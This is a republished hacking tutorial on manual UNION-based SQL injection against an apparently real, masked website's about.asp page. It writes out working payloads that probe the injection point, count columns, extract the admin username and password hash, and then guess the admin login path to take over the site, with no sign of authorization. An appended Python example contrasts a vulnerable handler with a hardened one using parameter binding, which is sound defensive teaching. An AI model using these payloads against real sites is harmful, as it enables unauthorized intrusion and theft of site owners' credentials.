[Hands-on] Manual SQL injection with a UNION query to take over a website

2025-01-20 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

I see a lot of script kiddies and tool fans sweeping websites with Ah D, Ming Xiaozi and Pangolin to grab an admin backend or the like. In fact, the fundamentals matter most, so today I will walk through manually injecting a site.

Target URL: http://www.******.com/about.asp?id=1

1. First, confirm whether there is integer injection here, which is very simple: append ', then and 1=1, then and 1=2 to the URL; I won't go into details. At the same time, we also determined that the database is Access.

2. Use order by to determine how many columns the query returns.

http://www.******.com/about.asp?id=1 order by 4 (here 5 returns an error and 4 is correct, so there are 4 columns)

3. Then test the display positions; positions 2 and 3 are shown on the page.

http://www.******.com/about.asp?id=1 and 1=2 union select 1,2,3,4 from admin

4. Guess the field values in the display positions. The table name and field names here are tried from experience; there are only a few common ones. We got the user name and password (an MD5 hash).

http://www.******.com/about.asp?id=1 and 1=2 union select 1,username,3,4 from admin

http://www.******.com/about.asp?id=1 and 1=2 union select 1,password,3,4 from admin

5. After getting the user name and password, look for the admin backend; common paths such as admin/login/manager/admin_login are worth a try. Logged in successfully, done. We'll talk about privilege escalation later.
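The root cause behind steps 1 to 4 and its fix, as an added example that is not part of the original article: the page handler concatenates the id parameter into the SQL text, and the hardened version validates it as an integer and binds it as a parameter. SQLite stands in for the Access database, and the about table, its columns and the admin row are constructed for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; SQLite stands in for the article's Access database.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE about (id INTEGER, title TEXT, body TEXT, hits INTEGER);
        INSERT INTO about VALUES (1, 'About us', 'Company profile', 0);
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO admin VALUES ('admin', 'constructed-md5-placeholder');
    """)
    return db

def about_vulnerable(db, raw_id):
    # The "before": the id parameter is concatenated into the SQL text,
    # so everything after the number is parsed as SQL.
    sql = "SELECT id, title, body, hits FROM about WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def about_hardened(db, raw_id):
    # Fix 1: accept only a short run of ASCII digits, reject anything else.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be an integer")
    # Fix 2: bind the value as a parameter so it can never become SQL syntax.
    sql = "SELECT id, title, body, hits FROM about WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def demo():
    db = make_db()
    # The query string from step 4 of the article.
    payload = "1 and 1=2 union select 1,username,3,4 from admin"
    leaked = about_vulnerable(db, payload)
    try:
        about_hardened(db, payload)
        rejected = False
    except ValueError:
        rejected = True
    normal = about_hardened(db, "1")
    return leaked, rejected, normal

if __name__ == "__main__":
    leaked, rejected, normal = demo()
    print("vulnerable handler returned:", leaked)
    print("hardened handler rejected payload:", rejected)
    print("hardened handler, id=1:", normal)
```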
